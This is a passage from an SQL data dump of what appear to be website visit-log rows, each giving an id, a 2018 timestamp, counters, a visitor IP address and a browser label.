.36.148.153','other'),(208059,1518707638,1,1,0,0,'54.36.148.111','other'),(208060,1518707744,1,1,0,0,'54.36.148.140','other'),(208061,1518707821,1,1,0,0,'54.36.148.28','other'),(208062,1518707862,1,1,0,0,'54.36.148.34','other'),(208063,1518707880,1,1,0,0,'54.36.149.41','other'),(208064,1518707893,1,1,0,0,'54.36.148.161','other'),(208065,1518708069,1,1,0,0,'54.36.148.239','other'),(208066,1518708300,1,1,0,0,'54.36.148.14','other'),(208067,1518708758,1,1,0,0,'188.230.43.254','other'),(208068,1518709000,2,2,0,0,'54.36.148.78','other'),(208069,1518709624,1,1,0,0,'54.36.148.12','other'),(208070,1518709640,1,1,0,0,'8.29.198.27','other'),(208071,1518709798,1,1,0,0,'54.36.149.21','other'),(208072,1518710232,1,1,0,0,'54.36.148.147','other'),(208073,1518710245,1,1,0,0,'54.36.148.249','other'),(208074,1518710302,1,1,0,0,'151.80.27.116','other'),(208075,1518710469,1,1,0,0,'54.36.148.136','other'),(208076,1518710512,1,1,0,0,'188.230.43.254','other'),(208077,1518710686,1,1,0,0,'54.36.148.104','other'),(208078,1518710848,1,1,0,0,'54.36.148.155','other'),(208079,1518710853,2,2,0,0,'91.209.11.236','other'),(208080,1518711377,1,1,0,0,'54.36.148.95','other'),(208081,1518711545,1,1,0,0,'54.36.148.70','other'),(208082,1518711902,1,1,0,0,'87.250.224.96','other'),(208083,1518712028,1,1,0,0,'137.74.207.170','other'),(208084,1518712081,1,1,0,0,'54.36.148.161','other'),(208085,1518712204,1,1,0,0,'54.36.148.250','other'),(208086,1518712220,1,1,0,0,'54.36.148.198','other'),(208087,1518712244,1,1,0,0,'37.9.113.74','other'),(208088,1518712273,1,1,0,0,'54.36.148.131','other'),(208089,1518712355,1,1,0,0,'188.230.43.254','other'),(208090,1518712368,1,1,0,0,'54.36.148.251','other'),(208091,1518712434,1,1,0,0,'54.36.148.100','other'),(208092,1518712460,1,1,0,0,'54.36.148.104','other'),(208093,1518712465,1,1,0,0,'137.74.207.188','other'),(208094,1518712516,2,2,0,0,'54.36.148.38','other'),(208095,1518712886,1,1,0,0,'137.74.201.99','other'),(208096,1518713215,1,1,0,0,'54.36.149.4','other'),(208097,1518713266,1,1,0,0,'193.194.127.222','firefox'),(208098,1518713319,1,1,0,0,'54.36.148.46','other'),(208099,1518713374,1,1,0,0,'207.46.13.168','other'),(208100,1518713604,1,1,0,0,'54.36.149.12','other'),(208101,1518713832,1,1,0,0,'95.133.192.24','chrome'),(208102,1518713865,1,1,0,0,'37.9.113.74','other'),(208103,1518713932,1,1,0,0,'193.110.23.201','firefox'),(208104,1518713941,1,1,0,0,'54.36.148.71','other'),(208105,1518713964,1,1,0,0,'54.36.148.213','other'),(208106,1518714755,1,1,0,0,'188.230.43.254','other'),(208107,1518714933,1,1,0,0,'54.36.148.43','other'),(208108,1518714962,1,1,0,0,'54.36.148.131','other'),(208109,1518715153,1,1,0,0,'207.46.13.147','other'),(208110,1518715170,1,1,0,0,'188.32.6.16','chrome'),(208111,1518715471,2,2,0,0,'79.143.186.26','other'),(208112,1518715675,1,1,0,0,'54.36.148.215','other'),(208113,1518716068,1,1,0,0,'91.196.178.18','chrome'),(208114,1518716102,1,1,0,0,'54.36.148.146','other'),(208115,1518716131,1,1,0,0,'54.36.149.62','other'),(208116,1518716225,1,1,0,0,'54.36.149.20','other'),(208117,1518716395,1,1,0,0,'178.93.131.163','chrome'),(208118,1518716434,1,0,1,0,'66.249.64.73',''),(208119,1518716586,1,1,0,0,'37.9.113.74','other'),(208120,1518716806,1,1,0,0,'54.36.149.98','other'),(208121,1518716875,1,1,0,0,'91.209.11.236','other'),(208122,1518716917,1,1,0,0,'54.36.148.208','other'),(208123,1518717040,1,1,0,0,'54.36.148.240','other'),(208124,1518717090,1,1,0,0,'54.36.148.67','other'),(208125,1518717198,1,1,0,0,'54.36.149.79','other'),(208126,1518717411,1,1,0,0,'54.36.148.91','other'),(208127,1518717536,1,1,0,0,'54.36.148.126','other'),(208128,1518717624,1,1,0,0,'54.36.148.82','other'),(208129,1518717641,1,1,0,0,'91.196.178.84','firefox'),(208130,1518717652,1,1,0,0,'54.36.148.68','other'),(208131,1518717719,2,2,0,0,'173.208.128.34','other'),(208132,1518717862,1,1,0,0,'54.36.148.78','other'),(208133,1518717877,1,1,0,0,'54.36.148.79','other'),(208134,1518718058,1,1,0,0,'54.36.149.46','other'),(208135,1518718476,1,1,0,0,'54.36.149.96','other'),(208136,1518718646,1,1,0,0,'130.180.210.67','other'),(208137,1518718948,1,1,0,0,'107.167.106.113','other'),(208138,1518718988,1,1,0,0,'54.36.148.70','other'),(208139,1518719293,1,1,0,0,'54.36.149.44','other'),(208140,1518719295,1,1,0,0,'54.36.148.187','other'),(208141,1518719435,1,1,0,0,'54.36.149.20','other'),(208142,1518719678,2,2,0,0,'54.36.148.164','other'),(208143,1518719746,1,1,0,0,'54.36.148.247','other'),(208144,1518719762,1,1,0,0,'54.36.148.46','other'),(208145,1518719825,1,1,0,0,'54.36.148.94','other'),(208146,1518720030,1,1,0,0,'54.36.148.104','other'),(208147,1518720460,1,1,0,0,'54.36.148.137','other'),(208148,1518720479,1,1,0,0,'8.29.198.25','other'),(208149,1518720509,1,1,0,0,'37.9.113.82','other'),(208150,1518720571,1,1,0,0,'91.209.11.236','other'),(208151,1518720721,1,1,0,0,'54.36.148.72','other'),(208152,1518721294,1,1,0,0,'54.36.149.50','other'),(208153,1518721435,1,1,0,0,'54.36.148.176','other'),(208154,1518721556,1,1,0,0,'54.36.148.137','other'),(208155,1518721575,1,1,0,0,'54.36.148.153','other'),(208156,1518721970,1,1,0,0,'54.36.148.80','other'),(208157,1518722109,1,1,0,0,'164.132.162.159','other'),(208158,1518722232,1,1,0,0,'95.108.213.24','other'),(208159,1518722243,1,1,0,0,'54.36.148.54','other'),(208160,1518722318,1,1,0,0,'54.36.148.128','other'),(208161,1518722555,1,1,0,0,'54.36.148.158','other'),(208162,1518722742,1,1,0,0,'54.36.148.162','other'),(208163,1518722880,1,1,0,0,'54.36.148.176','other'),(208164,1518723079,1,1,0,0,'54.36.148.135','other'),(208165,1518723122,1,1,0,0,'54.36.148.225','other'),(208166,1518723410,1,1,0,0,'54.36.149.72','other'),(208167,1518723453,1,1,0,0,'54.36.148.117','other'),(208168,1518723461,1,1,0,0,'54.36.148.212','other'),(208169,1518723519,1,1,0,0,'54.36.148.76','other'),(208170,1518723625,1,1,0,0,'54.36.148.94','other'),(208171,1518723905,2,2,0,0,'54.36.149.75','other'),(208172,1518724255,1,1,0,0,'54.36.148.209','other'),(208173,1518724288,1,1,0,0,'54.36.148.66','other'),(208174,1518724369,1,1,0,0,'54.36.148.155','other'),(208175,1518724647,1,1,0,0,'54.36.149.7','other'),(208176,1518724672,1,1,0,0,'54.36.148.204','other'),(208177,1518724710,1,1,0,0,'54.36.148.18','other'),(208178,1518724729,1,1,0,0,'107.167.116.13','other'),(208179,1518724782,1,1,0,0,'66.249.93.204','chrome'),(208180,1518725145,1,1,0,0,'54.36.148.251','other'),(208181,1518725176,1,1,0,0,'54.36.149.96','other'),(208182,1518725290,1,1,0,0,'54.36.149.18','other'),(208183,1518725652,1,1,0,0,'217.69.133.220','other'),(208184,1518725714,1,1,0,0,'54.36.148.239','other'),(208185,1518726212,1,1,0,0,'164.132.164.180','other'),(208186,1518726559,1,1,0,0,'54.36.148.189','other'),(208187,1518726666,1,1,0,0,'54.36.148.93','other'),(208188,1518726668,1,1,0,0,'54.36.148.91','other'),(208189,1518726835,1,1,0,0,'54.36.148.108','other'),(208190,1518726945,1,1,0,0,'178.154.171.81','other'),(208191,1518727053,1,1,0,0,'180.76.15.153','other'),(208192,1518727549,1,1,0,0,'54.36.148.17','other'),(208193,1518727865,1,1,0,0,'91.209.11.236','other'),(208194,1518728043,1,1,0,0,'54.36.148.49','other'),(208195,1518728121,1,1,0,0,'54.36.148.153','other'),(208196,1518728534,1,1,0,0,'54.36.149.70','other'),(208197,1518728620,1,1,0,0,'54.36.148.187','other'),(208198,1518728672,1,1,0,0,'54.36.149.64','other'),(208199,1518728757,1,1,0,0,'54.36.148.70','other'),(208200,1518728799,1,1,0,0,'54.36.148.244','other'),(208201,1518728973,1,1,0,0,'54.36.149.103','other'),(208202,1518728991,1,1,0,0,'54.36.148.87','other'),(208203,1518729086,1,1,0,0,'54.36.148.135','other'),(208204,1518729498,1,1,0,0,'54.36.149.44','other'),(208205,1518729551,1,0,1,0,'66.249.64.67',''),(208206,1518729770,1,1,0,0,'54.36.149.40','other'),(208207,1518730177,1,1,0,0,'54.36.148.14','other'),(208208,1518730586,1,1,0,0,'54.36.148.151','other'),(208209,1518730622,1,1,0,0,'54.36.148.141','other'),(208210,1518730750,1,1,0,0,'54.36.148.249','other'),(208211,1518730829,1,1,0,0,'54.36.148.156','other'),(208212,1518730927,1,1,0,0,'54.36.148.154','other'),(208213,1518731023,1,1,0,0,'54.36.149.14','other'),(208214,1518731069,1,1,0,0,'51.255.71.100','other'),(208215,1518731321,1,1,0,0,'8.29.198.26','other'),(208216,1518731340,2,2,0,0,'54.36.148.254','other'),(208217,1518731427,1,1,0,0,'54.36.148.139','other'),(208218,1518731773,1,1,0,0,'213.180.203.40','other'),(208219,1518731991,1,1,0,0,'54.36.148.22','other'),(208220,1518732226,1,1,0,0,'54.36.148.119','other'),(208221,1518732687,1,1,0,0,'54.36.148.249','other'),(208222,1518732739,1,1,0,0,'54.36.148.95','other'),(208223,1518732839,1,1,0,0,'54.36.149.21','other'),(208224,1518732958,1,1,0,0,'54.36.149.41','other'),(208225,1518733127,1,1,0,0,'54.36.148.236','other'),(208226,1518733158,1,1,0,0,'54.36.148.108','other'),(208227,1518733164,1,1,0,0,'54.36.148.50','other'),(208228,1518733280,1,1,0,0,'54.36.148.164','other'),(208229,1518733511,1,1,0,0,'54.36.148.208','other'),(208230,1518733734,1,1,0,0,'54.36.149.62','other'),(208231,1518733893,1,1,0,0,'54.36.149.63','other'),(208232,1518733959,1,1,0,0,'54.36.148.243','other'),(208233,1518734236,1,1,0,0,'207.46.13.168','other'),(208234,1518734298,1,1,0,0,'54.36.148.137','other'),(208235,1518734608,1,1,0,0,'54.36.149.41','other'),(208236,1518734687,1,1,0,0,'54.36.149.105','other'),(208237,1518734721,1,1,0,0,'141.8.142.74','other'),(208238,1518734968,1,1,0,0,'54.36.149.1','other'),(208239,1518735010,1,1,0,0,'54.36.148.154','other'),(208240,1518735498,1,1,0,0,'54.36.148.133','other'),(208241,1518735791,1,1,0,0,'54.36.148.90','other'),(208242,1518735919,1,1,0,0,'54.36.148.239','other'),(208243,1518735999,1,1,0,0,'217.69.133.30','other'),(208244,1518736230,1,1,0,0,'54.36.148.76','other'),(208245,1518736521,1,1,0,0,'54.36.148.212','other'),(208246,1518736539,1,1,0,0,'54.36.148.33','other'),(208247,1518736560,1,1,0,0,'54.36.149.103','other'),(208248,1518736840,1,1,0,0,'91.209.11.236','other'),(208249,1518736912,1,1,0,0,'54.36.148.114','other'),(208250,1518737467,1,1,0,0,'54.36.149.98','other'),(208251,1518737799,1,1,0,0,'54.36.148.65','other'),(208252,1518737900,1,1,0,0,'54.36.148.219','other'),(208253,1518737993,1,1,0,0,'54.36.148.125','other'),(208254,1518738016,1,1,0,0,'54.36.148.157','other'),(208255,1518738150,1,1,0,0,'54.36.148.13','other'),(208256,1518738174,1,1,0,0,'54.36.149.81','other'),(208257,1518738410,1,1,0,0,'137.74.207.161','other'),(208258,1518738436,1,1,0,0,'54.36.149.97','other'),(208259,1518738837,1,1,0,0,'54.36.148.242','other'),(208260,1518739005,1,1,0,0,'54.36.149.60','other'),(208261,1518739402,1,1,0,0,'54.36.148.162','other'),(208262,1518739791,1,1,0,0,'54.36.149.52','other'),(208263,1518739805,1,0,1,0,'66.249.64.73',''),(208264,1518739822,1,1,0,0,'54.36.148.145','other'),(208265,1518739935,1,1,0,0,'54.36.148.20','other'),(208266,1518740281,1,1,0,0,'54.36.148.29','other'),(208267,1518740781,1,1,0,0,'54.36.148.52','other'),(208268,1518740977,1,1,0,0,'54.36.149.67','other'),(208269,1518741111,1,1,0,0,'66.249.64.15','chrome'),(208270,1518741166,1,1,0,0,'54.36.149.107','other'),(208271,1518741453,1,1,0,0,'54.36.149.28','other'),(208272,1518741491,1,1,0,0,'54.36.149.26','other'),(208273,1518741979,1,1,0,0,'54.36.148.35','other'),(208274,1518742132,1,1,0,0,'54.36.148.238','other'),(208275,1518742159,1,1,0,0,'8.29.198.25','other'),(208276,1518742242,1,1,0,0,'164.132.162.159','other'),(208277,1518742275,1,1,0,0,'54.36.148.51','other'),(208278,1518742449,1,1,0,0,'54.36.148.66','other'),(208279,1518742550,1,1,0,0,'66.249.64.67','chrome'),(208280,1518742684,1,1,0,0,'54.36.148.131','other'),(208281,1518742919,1,1,0,0,'54.36.149.67','other'),(208282,1518742942,1,1,0,0,'54.36.148.170','other'),(208283,1518743056,1,1,0,0,'66.102.6.80','chrome'),(208284,1518743102,1,1,0,0,'54.36.149.44','other'),(208285,1518743150,1,1,0,0,'54.36.148.130','other'),(208286,1518743157,1,1,0,0,'54.36.149.84','other'),(208287,1518743526,1,1,0,0,'54.36.148.125','other'),(208288,1518743550,1,1,0,0,'54.36.148.140','other'),(208289,1518743589,1,1,0,0,'54.36.148.48','other'),(208290,1518743595,1,1,0,0,'54.36.149.86','other'),(208291,1518743731,1,1,0,0,'54.36.149.104','other'),(208292,1518743747,1,1,0,0,'54.36.148.84','other'),(208293,1518743793,1,1,0,0,'164.132.162.158','other'),(208294,1518743830,1,1,0,0,'54.36.148.123','other'),(208295,1518743869,1,1,0,0,'54.36.148.250','other'),(208296,1518743978,1,1,0,0,'137.74.207.108','other'),(208297,1518744111,1,1,0,0,'54.36.148.63','other'),(208298,1518744134,1,1,0,0,'217.69.133.85','other'),(208299,1518744466,1,1,0,0,'54.36.148.163','other'),(208300,1518744468,1,1,0,0,'54.36.148.243','other'),(208301,1518744673,1,1,0,0,'54.36.148.252','other'),(208302,1518744839,1,1,0,0,'54.36.149.65','other'),(208303,1518745301,2,2,0,0,'54.36.149.106','other'),(208304,1518745399,1,1,0,0,'54.36.148.140','other'),(208305,1518745486,1,1,0,0,'54.36.148.82','other'),(208306,1518745606,1,1,0,0,'54.36.148.134','other'),(208307,1518745637,1,1,0,0,'137.74.207.170','other'),(208308,1518745649,1,1,0,0,'54.36.148.241','other'),(208309,1518745962,1,1,0,0,'54.36.148.122','other'),(208310,1518746083,1,1,0,0,'54.165.59.7','other'),(208311,1518746238,1,1,0,0,'54.36.148.156','other'),(208312,1518746367,1,1,0,0,'137.74.207.109','other'),(208313,1518746412,1,1,0,0,'54.36.148.33','other'),(208314,1518746480,1,1,0,0,'54.36.148.38','other'),(208315,1518746787,1,1,0,0,'54.36.148.239','other'),(208316,1518747155,1,1,0,0,'54.36.148.82','other'),(208317,1518747423,1,1,0,0,'54.36.148.223','other'),(208318,1518748025,1,1,0,0,'54.36.148.139','other'),(208319,1518748049,1,1,0,0,'54.36.148.57','other'),(208320,1518748109,1,1,0,0,'54.36.148.199','other'),(208321,1518748508,1,1,0,0,'54.36.148.97','other'),(208322,1518748693,1,1,0,0,'51.255.71.98','other'),(208323,1518748754,1,1,0,0,'54.36.149.97','other'),(208324,1518748860,1,1,0,0,'54.36.148.113','other'),(208325,1518749071,1,1,0,0,'54.36.148.228','other'),(208326,1518749283,1,1,0,0,'54.36.148.235','other'),(208327,1518749823,1,1,0,0,'54.36.149.28','other'),(208328,1518749875,1,1,0,0,'54.36.148.222','other'),(208329,1518749913,1,1,0,0,'54.36.148.82','other'),(208330,1518750165,1,1,0,0,'54.36.148.101','other'),(208331,1518750186,1,1,0,0,'54.36.149.84','other'),(208332,1518750437,2,2,0,0,'54.36.149.7','other'),(208333,1518750496,1,1,0,0,'54.36.149.91','other'),(208334,1518750771,2,2,0,0,'54.36.149.26','other'),(208335,1518750800,1,1,0,0,'54.36.148.64','other'),(208336,1518750867,1,1,0,0,'54.36.148.113','other'),(208337,1518751135,1,1,0,0,'178.154.171.88','other'),(208338,1518751812,1,0,1,0,'66.249.64.67',''),(208339,1518752034,1,1,0,0,'54.36.148.239','other'),(208340,1518752041,1,1,0,0,'54.36.149.75','other'),(208341,1518752409,1,1,0,0,'207.46.13.168','other'),(208342,1518752469,1,1,0,0,'54.36.148.189','other'),(208343,1518752510,1,1,0,0,'54.36.149.66','other'),(208344,1518752755,1,1,0,0,'54.36.149.15','other'),(208345,1518752761,1,1,0,0,'13.56.229.65','chrome'),(208346,1518753016,1,1,0,0,'8.29.198.25','other'),(208347,1518753028,1,1,0,0,'54.36.148.61','other'),(208348,1518753029,1,1,0,0,'54.36.148.63','other'),(208349,1518753293,1,1,0,0,'54.36.148.239','other'),(208350,1518753624,1,1,0,0,'54.36.148.125','other'),(208351,1518753677,1,1,0,0,'54.36.148.160','other'),(208352,1518753707,1,1,0,0,'54.36.148.192','other'),(208353,1518753857,1,1,0,0,'91.209.11.236','other'),(208354,1518753944,1,1,0,0,'54.36.148.231','other'),(208355,1518754054,1,1,0,0,'54.36.148.33','other'),(208356,1518754456,1,1,0,0,'54.36.149.13','other'),(208357,1518754574,1,1,0,0,'213.180.203.40','other'),(208358,1518754644,1,1,0,0,'107.167.116.101','other'),(208359,1518754790,1,1,0,0,'107.167.105.3','other'),(208360,1518754810,1,1,0,0,'54.36.148.117','other'),(208361,1518755138,1,1,0,0,'54.36.148.122','other'),(208362,1518755302,1,1,0,0,'54.36.149.61','other'),(208363,1518755335,1,1,0,0,'212.83.178.172','chrome'),(208364,1518755721,1,1,0,0,'54.36.148.29','other'),(208365,1518755842,1,1,0,0,'5.45.207.83','other'),(208366,1518755851,1,1,0,0,'54.36.149.13','other'),(208367,1518756418,1,1,0,0,'217.69.133.253','other'),(208368,1518756460,1,1,0,0,'164.132.162.164','other'),(208369,1518756463,1,1,0,0,'54.36.148.136','other'),(208370,1518756632,1,1,0,0,'54.36.148.93','other'),(208371,1518756713,1,1,0,0,'46.161.9.39','firefox'),(208372,1518756759,1,1,0,0,'54.36.148.247','other'),(208373,1518756767,1,1,0,0,'54.36.148.138','other'),(208374,1518756820,1,1,0,0,'54.36.149.52','other'),(208375,1518756985,1,1,0,0,'54.36.148.219','other'),(208376,1518757115,1,1,0,0,'54.36.148.29','other'),(208377,1518757137,1,1,0,0,'54.36.148.101','other'),(208378,1518757322,1,1,0,0,'207.46.13.147','other'),(208379,1518757470,1,1,0,0,'217.69.133.225','other'),(208380,1518757481,1,1,0,0,'54.36.148.161','other'),(208381,1518757550,1,1,0,0,'54.36.148.16','other'),(208382,1518757649,1,1,0,0,'54.36.148.228','other'),(208383,1518757656,1,1,0,0,'54.36.148.90','other'),(208384,1518757838,1,1,0,0,'217.69.133.245','other'),(208385,1518757839,1,1,0,0,'54.36.148.65','other'),(208386,1518757900,1,1,0,0,'54.36.148.22','other'),(208387,1518758066,1,1,0,0,'54.36.148.198','other'),(208388,1518758178,1,1,0,0,'54.36.148.195','other'),(208389,1518758563,1,1,0,0,'54.36.148.127','other'),(208390,1518758635,1,1,0,0,'217.69.133.67','other'),(208391,1518758816,1,1,0,0,'54.36.148.241','other'),(208392,1518758968,1,1,0,0,'54.36.148.98','other'),(208393,1518759288,1,1,0,0,'54.36.148.64','other'),(208394,1518759400,2,2,0,0,'91.196.177.46','chrome'),(208395,1518759598,1,1,0,0,'54.36.148.136','other'),(208396,1518759837,1,1,0,0,'54.36.148.116','other'),(208397,1518759876,1,1,0,0,'54.36.148.141','other'),(208398,1518759898,1,1,0,0,'54.36.148.222','other'),(208399,1518759963,1,1,0,0,'54.36.148.160','other'),(208400,1518760063,1,1,0,0,'54.36.148.89','other'),(208401,1518760227,1,1,0,0,'54.36.148.254','other'),(208402,1518760309,1,1,0,0,'54.36.149.99','other'),(208403,1518760508,1,1,0,0,'54.36.148.158','other'),(208404,1518760544,1,0,1,0,'66.249.69.145',''),(208405,1518760814,1,1,0,0,'54.36.148.237','other'),(208406,1518760883,1,1,0,0,'54.36.149.58','other'),(208407,1518761031,1,1,0,0,'54.36.148.92','other'),(208408,1518761048,1,1,0,0,'46.42.167.48','msie'),(208409,1518761058,1,1,0,0,'54.36.148.55','other'),(208410,1518761074,2,2,0,0,'91.209.11.236','other'),(208411,1518761211,1,1,0,0,'54.36.148.224','other'),(208412,1518761328,1,1,0,0,'54.36.148.255','other'),(208413,1518761474,1,1,0,0,'54.36.148.141','other'),(208414,1518761600,1,1,0,0,'54.36.148.25','other'),(208415,1518761608,2,2,0,0,'91.196.177.46','chrome'),(208416,1518761756,1,1,0,0,'54.36.148.26','other'),(208417,1518761913,1,1,0,0,'128.72.151.219','msie'),(208418,1518761919,1,1,0,0,'54.36.148.128','other'),(208419,1518761990,2,2,0,0,'141.8.142.74','other'),(208420,1518762039,1,1,0,0,'54.36.149.75','other'),(208421,1518762283,1,1,0,0,'54.36.149.81','other'),(208422,1518762313,1,1,0,0,'54.36.148.230','other'),(208423,1518762319,1,1,0,0,'54.36.148.145','other'),(208424,1518762500,1,1,0,0,'54.36.149.52','other'),(208425,1518762870,1,1,0,0,'54.36.148.188','other'),(208426,1518763107,2,2,0,0,'91.196.178.80','chrome'),(208427,1518763400,1,1,0,0,'54.36.148.30','other'),(208428,1518763833,1,1,0,0,'178.93.6.171','chrome'),(208429,1518763862,1,1,0,0,'8.29.198.27','other'),(208430,1518764092,1,1,0,0,'54.36.148.91','other'),(208431,1518764133,1,1,0,0,'213.180.203.40','other'),(208432,1518764426,2,2,0,0,'54.36.148.252','other'),(208433,1518765126,1,1,0,0,'37.9.113.151','other'),(208434,1518765284,1,1,0,0,'54.36.148.13','other'),(208435,1518765822,1,1,0,0,'54.36.148.86','other'),(208436,1518765908,1,1,0,0,'54.36.148.20','other'),(208437,1518765915,1,1,0,0,'207.46.13.147','other'),(208438,1518765973,1,1,0,0,'78.111.186.47','chrome'),(208439,1518766072,1,1,0,0,'54.36.148.232','other'),(208440,1518766234,1,1,0,0,'54.36.149.62','other'),(208441,1518766268,1,1,0,0,'54.36.148.129','other'),(208442,1518766430,1,1,0,0,'91.196.178.166','chrome'),(208443,1518766675,1,1,0,0,'54.36.149.95','other'),(208444,1518766901,1,1,0,0,'54.36.148.14','other'),(208445,1518767043,1,1,0,0,'54.36.148.169','other'),(208446,1518767108,1,1,0,0,'54.36.148.253','other'),(208447,1518767196,1,1,0,0,'54.36.148.95','other'),(208448,1518767343,1,1,0,0,'54.36.148.96','other'),(208449,1518767879,1,1,0,0,'54.36.149.92','other'),(208450,1518767930,1,1,0,0,'54.36.149.71','other'),(208451,1518768189,1,1,0,0,'54.36.148.170','other'),(208452,1518768440,1,1,0,0,'54.36.148.69','other'),(208453,1518768474,1,1,0,0,'54.36.148.232','other'),(208454,1518768478,1,1,0,0,'54.36.148.23','other'),(208455,1518768632,1,1,0,0,'54.36.148.36','other'),(208456,1518768755,1,1,0,0,'165.227.150.167','other'),(208457,1518768828,1,0,1,0,'66.249.69.144',''),(208458,1518768870,1,1,0,0,'54.36.148.245','other'),(208459,1518768919,1,1,0,0,'164.132.162.159','other'),(208460,1518769107,1,1,0,0,'91.209.11.236','other'),(208461,1518769320,1,1,0,0,'54.36.149.39','other'),(208462,1518769476,1,1,0,0,'92.112.125.243','chrome'),(208463,1518769825,1,1,0,0,'180.76.15.27','other'),(208464,1518769886,1,1,0,0,'91.196.178.89','chrome'),(208465,1518769982,1,1,0,0,'5.45.207.82','other'),(208466,1518770126,1,1,0,0,'54.36.148.62','other'),(208467,1518770134,1,1,0,0,'91.209.11.236','other'),(208468,1518770137,1,1,0,0,'137.74.207.102','other'),(208469,1518770222,1,1,0,0,'54.36.148.209','other'),(208470,1518770277,1,1,0,0,'54.36.148.244','other'),(208471,1518770654,1,1,0,0,'54.36.149.51','other'),(208472,1518770664,1,1,0,0,'54.36.148.76','other'),(208473,1518770790,1,1,0,0,'178.94.57.8','firefox'),(208474,1518770811,1,1,0,0,'54.36.148.195','other'),(208475,1518770906,1,1,0,0,'54.36.148.187','other'),(208476,1518771137,1,1,0,0,'54.36.149.90','other'),(208477,1518771490,1,1,0,0,'54.36.148.35','other'),(208478,1518771491,2,2,0,0,'54.36.149.14','other'),(208479,1518771546,1,1,0,0,'54.36.148.33','other'),(208480,1518771773,1,1,0,0,'54.36.149.69','other'),(208481,1518771864,1,1,0,0,'66.249.75.155','chrome'),(208482,1518771887,1,1,0,0,'92.113.144.230','chrome'),(208483,1518772010,1,1,0,0,'54.36.148.105','other'),(208484,1518772280,2,2,0,0,'78.111.190.212','chrome'),(208485,1518772556,1,1,0,0,'54.36.148.243','other'),(208486,1518772768,1,1,0,0,'5.45.207.58','other'),(208487,1518772812,1,1,0,0,'91.209.11.236','other'),(208488,1518772845,1,1,0,0,'91.196.177.46','chrome'),(208489,1518772857,1,1,0,0,'37.9.113.157','other'),(208490,1518773231,1,1,0,0,'66.249.69.145','chrome'),(208491,1518773322,1,1,0,0,'54.36.148.130','other'),(208492,1518773328,1,1,0,0,'54.36.148.249','other'),(208493,1518773417,1,1,0,0,'54.36.148.81','other'),(208494,1518773654,1,1,0,0,'54.36.149.99','other'),(208495,1518773699,1,1,0,0,'94.179.151.13','chrome'),(208496,1518773719,1,1,0,0,'91.196.178.166','chrome'),(208497,1518773788,1,1,0,0,'54.36.148.208','other'),(208498,1518773804,1,1,0,0,'217.69.133.84','other'),(208499,1518773809,2,2,0,0,'54.36.148.22','other'),(208500,1518774355,1,1,0,0,'217.69.133.218','other'),(208501,1518774584,1,1,0,0,'54.36.148.203','other'),(208502,1518774597,1,1,0,0,'207.46.13.171','other'),(208503,1518774598,1,1,0,0,'54.36.149.81','other'),(208504,1518774713,1,1,0,0,'8.29.198.27','other'),(208505,1518774719,1,1,0,0,'54.36.148.231','other'),(208506,1518774780,1,1,0,0,'54.36.149.64','other'),(208507,1518774793,1,1,0,0,'54.36.148.69','other'),(208508,1518774926,1,1,0,0,'54.36.148.40','other'),(208509,1518775047,1,1,0,0,'54.36.148.126','other'),(208510,1518775318,1,1,0,0,'141.8.142.74','other'),(208511,1518775319,1,1,0,0,'137.74.201.100','other'),(208512,1518775451,1,1,0,0,'178.154.200.8','other'),(208513,1518775490,1,1,0,0,'137.74.201.108','other'),(208514,1518775509,1,1,0,0,'54.36.148.145','other'),(208515,1518776019,1,1,0,0,'54.36.148.90','other'),(208516,1518776044,1,1,0,0,'137.74.207.109','other'),(208517,1518776101,1,1,0,0,'54.36.148.180','other'),(208518,1518776142,1,1,0,0,'54.36.149.59','other'),(208519,1518776181,2,2,0,0,'199.58.86.211','other'),(208520,1518776232,1,1,0,0,'54.36.149.72','other'),(208521,1518776335,1,1,0,0,'217.69.133.219','other'),(208522,1518776345,1,1,0,0,'54.36.148.29','other'),(208523,1518776677,1,1,0,0,'195.10.210.70','chrome'),(208524,1518776796,1,1,0,0,'54.36.148.88','other'),(208525,1518776843,1,1,0,0,'54.36.148.238','other'),(208526,1518776964,1,1,0,0,'54.36.149.78','other'),(208527,1518777085,1,1,0,0,'54.36.148.18','other'),(208528,1518777173,1,1,0,0,'54.36.149.75','other'),(208529,1518777176,2,2,0,0,'91.196.178.167','chrome'),(208530,1518777178,1,1,0,0,'217.69.133.234','other'),(208531,1518777328,2,2,0,0,'91.196.177.15','chrome'),(208532,1518777384,1,1,0,0,'54.36.149.5','other'),(208533,1518777433,1,1,0,0,'54.36.148.64','other'),(208534,1518777554,1,1,0,0,'91.196.178.87','firefox'),(208535,1518777875,1,1,0,0,'95.132.63.22','firefox'),(208536,1518777912,1,1,0,0,'54.36.148.244','other'),(208537,1518778066,1,1,0,0,'141.8.132.22','other'),(208538,1518778194,1,1,0,0,'54.36.148.189','other'),(208539,1518778387,1,1,0,0,'54.36.148.13','other'),(208540,1518778556,1,1,0,0,'54.36.149.44','other'),(208541,1518778561,1,1,0,0,'54.36.148.82','other'),(208542,1518778681,1,1,0,0,'51.255.71.100','other'),(208543,1518778784,1,1,0,0,'54.36.149.67','other'),(208544,1518778800,1,1,0,0,'54.36.149.1','other'),(208545,1518778951,1,1,0,0,'54.36.148.84','other'),(208546,1518778986,1,1,0,0,'54.36.148.83','other'),(208547,1518779154,1,1,0,0,'54.36.148.255','other'),(208548,1518779299,1,1,0,0,'54.36.149.61','other'),(208549,1518780050,1,1,0,0,'54.36.148.210','other'),(208550,1518780136,1,1,0,0,'54.36.148.56','other'),(208551,1518780435,1,1,0,0,'54.36.148.192','other'),(208552,1518780472,1,1,0,0,'137.74.201.100','other'),(208553,1518780731,1,1,0,0,'54.36.149.4','other'),(208554,1518780986,1,1,0,0,'54.36.148.125','other'),(208555,1518781010,1,1,0,0,'54.36.149.60','other'),(208556,1518781074,2,2,0,0,'91.196.178.162','chrome'),(208557,1518781291,1,1,0,0,'93.74.209.194','firefox'),(208558,1518781393,1,1,0,0,'207.46.13.58','other'),(208559,1518781537,1,1,0,0,'54.36.148.206','other'),(208560,1518781575,1,1,0,0,'54.36.148.191','other'),(208561,1518781692,1,1,0,0,'54.36.149.11','other'),(208562,1518781712,1,1,0,0,'54.36.148.77','other'),(208563,1518781790,1,1,0,0,'54.36.148.49','other'),(208564,1518781887,1,1,0,0,'54.36.148.63','other'),(208565,1518782019,1,1,0,0,'54.36.148.168','other'),(208566,1518782165,1,1,0,0,'54.36.148.115','other'),(208567,1518782174,1,1,0,0,'54.36.148.172','other'),(208568,1518782278,1,1,0,0,'54.36.148.156','other'),(208569,1518782416,1,1,0,0,'54.36.148.222','other'),(208570,1518782575,1,1,0,0,'54.36.148.181','other'),(208571,1518782627,1,1,0,0,'213.180.203.8','other'),(208572,1518782654,1,1,0,0,'54.36.148.130','other'),(208573,1518782764,1,1,0